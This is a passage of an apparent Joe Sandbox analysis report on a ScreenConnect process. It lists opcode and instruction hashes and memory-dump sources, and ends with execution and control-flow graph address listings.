                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83c2506f02889d142f906f4ce08e00c9f18b8101accec568b3c4c77d17c7772b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4F0E5363012045FC3049B7CF82C85D3BAADBDA162304446AE826C73C1CF64EC02D7A4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2f77f523240ef85e7cdf0470e52ba70a3e1d7762d0de8b5cc2b0f75aac2bbda2
                                                                                                                                                                                                                                                  • Instruction ID: 8137b3f2753754bb0f84f82f3e2af3a71543eed010afb23414d6882ec59d2d80
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f77f523240ef85e7cdf0470e52ba70a3e1d7762d0de8b5cc2b0f75aac2bbda2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23F0B271E002199F8B44DFADC84169EFBF5EF49200B64816AD918EB215E331AA12CBC0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5631e94e65ac23ca27c1bfc30cad35c7d909c3a7b0a1a5b63aad233df86a5d1a
                                                                                                                                                                                                                                                  • Instruction ID: e458cad9e9f0ced3bf86c61137fe8b5dbe55bdceccbbfdd2ae09903767d4feb3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5631e94e65ac23ca27c1bfc30cad35c7d909c3a7b0a1a5b63aad233df86a5d1a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73E0DF323102109B97186AAF788C42ABADBEBC8661B18403DE60AC3340CE6A9C0583B4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2a1d7f45846043485bbdd954d57763ff51a9ff2150eb47d7eec7527bfa278687
                                                                                                                                                                                                                                                  • Instruction ID: 129bf3fcfcd4ec386bea3ab4cb77c842abe92df6a5f5810177752ce96829c0ed
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a1d7f45846043485bbdd954d57763ff51a9ff2150eb47d7eec7527bfa278687
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83E0E572A042042FCB5C8BA8A4105AD7FF49F87320B1484AFC04AD3291CA3958018744
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 1f472c1ba76dddeb36da8e543b30479f0bfea84a5cf8dbae19fa4d33ea699beb
                                                                                                                                                                                                                                                  • Instruction ID: 2ec25619a1cc8f599307510d267154c3b0af5a52a635711b82064b13c8044b51
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f472c1ba76dddeb36da8e543b30479f0bfea84a5cf8dbae19fa4d33ea699beb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4E0D8322001005B8305BB69AC0449F7796EBC1222308887FE50ACB348DE629C0687E4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 415f90a3d9b64b4dfe598b48392fe0e2180955e405ec740906ffd3bbbff57b31
                                                                                                                                                                                                                                                  • Instruction ID: f1426cfa323f7f58d5cedd40626df16e1b005ee8f8f791609c4bcab7fa1b3461
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 415f90a3d9b64b4dfe598b48392fe0e2180955e405ec740906ffd3bbbff57b31
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9E07D32B012054BC318951AEC40A57B3AEEBC9760F60047CD20CC7359CD729C02C3D0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: cbde9b3087b3540cc9bedf9255242d3b0aee2180af10e6f6f0f534d5a38e50ed
                                                                                                                                                                                                                                                  • Instruction ID: 271aa7bc6d768a741c3880a92c7dec57b5103a92c5b04353d9b5360a7f5a44e6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbde9b3087b3540cc9bedf9255242d3b0aee2180af10e6f6f0f534d5a38e50ed
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41E086327016059F83249B5AE984C5BBFA9EB856643408469E50D8B741DE60FC05C7F4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5bf7f32e89ec8322163b045c249715a50551a0b417ad447925146de3c72f1d20
                                                                                                                                                                                                                                                  • Instruction ID: 456d12817683cde8e056d5c5f1695f432be025725df7a02f84e62f46c8bbef29
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5bf7f32e89ec8322163b045c249715a50551a0b417ad447925146de3c72f1d20
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BE0DF367082408FC3018F19E448845BFB5EF8A22070640ABFD48CB321DA309D21CB91
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2298735ac237c035a4d3217025e0f0d10c2dd58a80c68486bb940f0818a5fe9e
                                                                                                                                                                                                                                                  • Instruction ID: 207e8a5a2b0b5b42728657a25ae8af81767b75f731a47931002bb78718babbf4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2298735ac237c035a4d3217025e0f0d10c2dd58a80c68486bb940f0818a5fe9e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9E092212097850FC723DB68F8456CE7FB1AAC6214F094AEED48597297C660A94D83A9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 6baf5c6b6f89fd0e9a2ceaed6563e80e6f7357f745ec65fd2b93f6bf6b1c81c9
                                                                                                                                                                                                                                                  • Instruction ID: a5e46ce18962355690885a0401c0efb23b75759bb9bb3e565996c84d241c9923
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6baf5c6b6f89fd0e9a2ceaed6563e80e6f7357f745ec65fd2b93f6bf6b1c81c9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8E086313402085B47046B6DA80046E77AADAC6121344C96DE509DB315DE62EC0747D4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c24799058562ec0aff1b99d2c0c3d61739e9f636542a0203337df1ad592b66a7
                                                                                                                                                                                                                                                  • Instruction ID: 70c91a3c371091a11b68c78d10df922562346bd22385a0f3985eb35cb0a4f8de
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c24799058562ec0aff1b99d2c0c3d61739e9f636542a0203337df1ad592b66a7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39E086393011105B8304677DF40C45E7B9BEBD95613104525E92BC7380CF749C02C7A4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 0fefc25f35a03c89cce5e73ccd33b2816869d648bb923edf7efff5da3424d6bf
                                                                                                                                                                                                                                                  • Instruction ID: 205309118936fc331f232834ba416d39f42ac0b5138f470bf5abfc7320786bfc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fefc25f35a03c89cce5e73ccd33b2816869d648bb923edf7efff5da3424d6bf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98E0C2333901209FD7155B68E854B967FA5DF9A120B0540EAE544CF322DA32DC4183DA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c4d9c0be570b29bcbffe27cfdec5134bef768ab5370d1f9cf66b02df491bfce8
                                                                                                                                                                                                                                                  • Instruction ID: f0f98a09e976709c8fe3f4a8decd380ccfb4bcc0fdf2785219d05c60edc2d746
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4d9c0be570b29bcbffe27cfdec5134bef768ab5370d1f9cf66b02df491bfce8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEE04F7150D3809FC3419F38AD145497FF0AE06200B4A44AAD8C9C7655E231AC45C762
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: db9249e110bb76ac3034ee9e435dc3446658c0d11260b1831bad6eae02ca8f27
                                                                                                                                                                                                                                                  • Instruction ID: ced08e1743c96909914d7169c158b27bcb96db36828136221b8d67f5829f2145
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db9249e110bb76ac3034ee9e435dc3446658c0d11260b1831bad6eae02ca8f27
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3E0DF75E15288DFC755DFB8EA4165DBBB0EF8A201B114DEEC80CD7222EA30AE04DB00
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 30434db39a9e5c5a07737fadeee8680f08d3911aa0cb3c9d7700d051868f9fbc
                                                                                                                                                                                                                                                  • Instruction ID: 1cbe765623e6f924d609ca431b6ab9a1b2c3d5f1f5beac6d8d1f560402c7eec7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30434db39a9e5c5a07737fadeee8680f08d3911aa0cb3c9d7700d051868f9fbc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09D05E3A3005149F83049B4EE408C4AFFEAEFC9721305806AF609C7320CA71EC01CB94
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 785efd9fc32f958b373a5b21e19b5b9c3ef7096e647c9618fb6ee7e1940ccdfa
                                                                                                                                                                                                                                                  • Instruction ID: cff679f953b4a5e677e972224f926a260fc2d9a742fe16a167a2c683e999795d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 785efd9fc32f958b373a5b21e19b5b9c3ef7096e647c9618fb6ee7e1940ccdfa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47E086314047498FC701AF74D4990A8BB70EE95304B15868BD8495B113FB7095A5D782
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b5d608ab8f56d0c101b7007425b922bb7649c59669400c23c508028d926e193b
                                                                                                                                                                                                                                                  • Instruction ID: 4937e02be3893b1ea77286f1e8ea47dd8b481fbb5fecd728f040ae6bd79a7104
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5d608ab8f56d0c101b7007425b922bb7649c59669400c23c508028d926e193b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAD01274A11188EF8B44EFA8E90055DB7B5EB45204B1085A9D909D3300EA31AF04DB54
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 72e707b728c7e3e2f7ae5ee1ee3347b86f98b72c96f3afa1f4e2d1db9c1932a3
                                                                                                                                                                                                                                                  • Instruction ID: a928dde544c61969eab458c646488e8da650dc8d95199800b4d8c2184640b068
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72e707b728c7e3e2f7ae5ee1ee3347b86f98b72c96f3afa1f4e2d1db9c1932a3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59D013323501149F97089B5DD414C577BDDDF9D56031140A5F505C7331DA71DC5097D5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 54e68ddb6de1efc41a998c19a7c0bbfbd5553b6d5cae5361f2430b2145304a6d
                                                                                                                                                                                                                                                  • Instruction ID: 59d8df2cbcae213e8008c5a3a6a7fd41df4c0df9cc5ef07712ddc0828cb305b7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54e68ddb6de1efc41a998c19a7c0bbfbd5553b6d5cae5361f2430b2145304a6d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30D012353105285F8744AA5DD404C9977DEDF5E6703504066FA05CB330DEB1EC10A7D5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 0ece720421720f45b5e4f261400ee7e7ca3ca5901c59e0bb4b5d9a36c0f7e9bf
                                                                                                                                                                                                                                                  • Instruction ID: 72f6fe8967bbe0c2e9bea8ff97a8675803705466776407ae85ec43374d6ceab3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ece720421720f45b5e4f261400ee7e7ca3ca5901c59e0bb4b5d9a36c0f7e9bf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53D0C73141470D89C700BB78D854469B7B8EED5240F04D65BE44957111FF70E5D0D681
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: bfcb232092e6f081bff8b2b4e5b617392b308f754c4fb1393985d07279a91b93
                                                                                                                                                                                                                                                  • Instruction ID: 5e6a49debcea1dbfef3c1d329c54e465239abf12a80de42feaf6a22dcf3e5de0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfcb232092e6f081bff8b2b4e5b617392b308f754c4fb1393985d07279a91b93
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30A0028AA8020402A5687E354DC516B231FB7D41147CC8498011244158EE2DD0069410
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 0eb6ae77add54e10c84beb22618b2a9ff6cd188fe5f0027025dd1c66d7a8f010
                                                                                                                                                                                                                                                  • Instruction ID: 8ecd76cd7f1403fdd00de3eec8c4ceab7a6ba169a6f326fa5a18981b47b18b1a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0eb6ae77add54e10c84beb22618b2a9ff6cd188fe5f0027025dd1c66d7a8f010
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1A002752010009BC244DB54C995C15F765EFE5319728C4AEA9198B256CF33ED13DA54

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:13.7%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:5
                                                                                                                                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                                                                                                                                  execution_graph 12589 7ffd9b888014 12591 7ffd9b88801d 12589->12591 12590 7ffd9b888082 12591->12590 12592 7ffd9b8880f6 SetProcessMitigationPolicy 12591->12592 12593 7ffd9b888152 12592->12593

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 339 7ffd9bb969fb-7ffd9bb96a21 340 7ffd9bb96a25-7ffd9bb96a49 339->340 343 7ffd9bb96a4b-7ffd9bb96b5c 340->343 351 7ffd9bb96ba6-7ffd9bb96bb6 343->351 352 7ffd9bb96b5e-7ffd9bb96b7a 343->352 359 7ffd9bb96bb8-7ffd9bb96bba 351->359 360 7ffd9bb96bbc-7ffd9bb96bca 351->360 353 7ffd9bb96f88-7ffd9bb96fa6 call 7ffd9bb90960 * 2 352->353 354 7ffd9bb96b80-7ffd9bb96b9e call 7ffd9bb90960 * 2 352->354 370 7ffd9bb96fac-7ffd9bb96fb3 353->370 371 7ffd9bb970b2-7ffd9bb970bd 353->371 368 7ffd9bb96e1e-7ffd9bb96e3c call 7ffd9bb90960 * 2 354->368 369 7ffd9bb96ba4-7ffd9bb96ba5 354->369 363 7ffd9bb96bcd-7ffd9bb96be2 359->363 360->363 375 7ffd9bb96be8-7ffd9bb96c0c call 7ffd9bb95160 * 2 363->375 376 7ffd9bb96be4-7ffd9bb96be6 363->376 391 7ffd9bb96e66-7ffd9bb96e84 call 7ffd9bb90960 * 2 368->391 392 7ffd9bb96e3e-7ffd9bb96e48 368->392 369->351 373 7ffd9bb96fb5-7ffd9bb96fc4 370->373 374 7ffd9bb96fc6-7ffd9bb96fc8 370->374 373->374 387 7ffd9bb96fca 373->387 379 7ffd9bb96fcf-7ffd9bb96ff3 374->379 380 7ffd9bb96c0f-7ffd9bb96c24 375->380 376->380 395 7ffd9bb96ff5-7ffd9bb97012 379->395 396 7ffd9bb9703f-7ffd9bb9704e 379->396 393 7ffd9bb96c26-7ffd9bb96c28 380->393 394 7ffd9bb96c2a-7ffd9bb96c4e call 7ffd9bb95160 * 2 380->394 387->379 423 7ffd9bb96e8a-7ffd9bb96e95 391->423 424 7ffd9bb96f3b-7ffd9bb96f46 391->424 397 7ffd9bb96e4a-7ffd9bb96e5a 392->397 398 7ffd9bb96e5c 392->398 399 7ffd9bb96c51-7ffd9bb96c66 393->399 394->399 404 7ffd9bb97018-7ffd9bb9703d 395->404 405 7ffd9bb970be-7ffd9bb97137 395->405 396->371 407 7ffd9bb96e5e-7ffd9bb96e5f 397->407 398->407 416 7ffd9bb96c68-7ffd9bb96c6a 399->416 417 7ffd9bb96c6c-7ffd9bb96c83 call 7ffd9bb95160 399->417 404->396 431 7ffd9bb97139-7ffd9bb9716f 405->431 432 7ffd9bb97180-7ffd9bb971d6 405->432 407->391 421 7ffd9bb96c93-7ffd9bb96ca1 416->421 417->421 435 7ffd9bb96ca7-7ffd9bb96cb5 421->435 436 7ffd9bb96ca3-7ffd9bb96ca5 421->436 433 7ffd9bb96e97-7ffd9bb96e99 423->433 434 7ffd9bb96e9b-7ffd9bb96eaa 423->434 437 7ffd9bb96f48-7ffd9bb96f4a 424->437 438 7ffd9bb96f4c-7ffd9bb96f50 424->438 463 7ffd9bb971dd-7ffd9bb97200 431->463 470 7ffd9bb97171-7ffd9bb9717d 431->470 457 7ffd9bb971d8-7ffd9bb971d9 432->457 458 7ffd9bb971dc 432->458 440 7ffd9bb96ead-7ffd9bb96ecd 433->440 434->440 441 7ffd9bb96cb8-7ffd9bb96cc1 435->441 436->441 442 7ffd9bb96f5e-7ffd9bb96f60 437->442 449 7ffd9bb96f5a-7ffd9bb96f5b 438->449 446 7ffd9bb96ecf-7ffd9bb96ee1 440->446 462 7ffd9bb96cc8-7ffd9bb96ccf 441->462 442->371 450 7ffd9bb96f66-7ffd9bb96f78 442->450 446->424 456 7ffd9bb96ee3-7ffd9bb96ef1 446->456 449->442 450->353 450->449 460 7ffd9bb96ef3-7ffd9bb96efb 456->460 461 7ffd9bb96f04-7ffd9bb96f0c 456->461 457->458 458->463 465 7ffd9bb96f0d-7ffd9bb96f0e 460->465 466 7ffd9bb96efd-7ffd9bb96f02 460->466 461->465 467 7ffd9bb96f1e-7ffd9bb96f33 461->467 462->368 468 7ffd9bb96cd5-7ffd9bb96cdc 462->468 473 7ffd9bb97232-7ffd9bb9723b 463->473 474 7ffd9bb97202-7ffd9bb97211 463->474 471 7ffd9bb96f13-7ffd9bb96f1d call 7ffd9bb96820 465->471 466->471 467->446 484 7ffd9bb96f35-7ffd9bb96f38 467->484 468->368 472 7ffd9bb96ce2-7ffd9bb96cf9 468->472 470->432 471->467 482 7ffd9bb96cfb-7ffd9bb96d0d 472->482 483 7ffd9bb96d2e-7ffd9bb96d39 472->483 479 7ffd9bb97217-7ffd9bb97231 474->479 480 7ffd9bb97213-7ffd9bb97214 474->480 480->479 488 7ffd9bb96d0f-7ffd9bb96d11 482->488 489 7ffd9bb96d13-7ffd9bb96d21 482->489 491 7ffd9bb96d3b-7ffd9bb96d3d 483->491 492 7ffd9bb96d3f-7ffd9bb96d4e 483->492 484->424 493 7ffd9bb96d24-7ffd9bb96d27 488->493 489->493 494 7ffd9bb96d51-7ffd9bb96d53 491->494 492->494 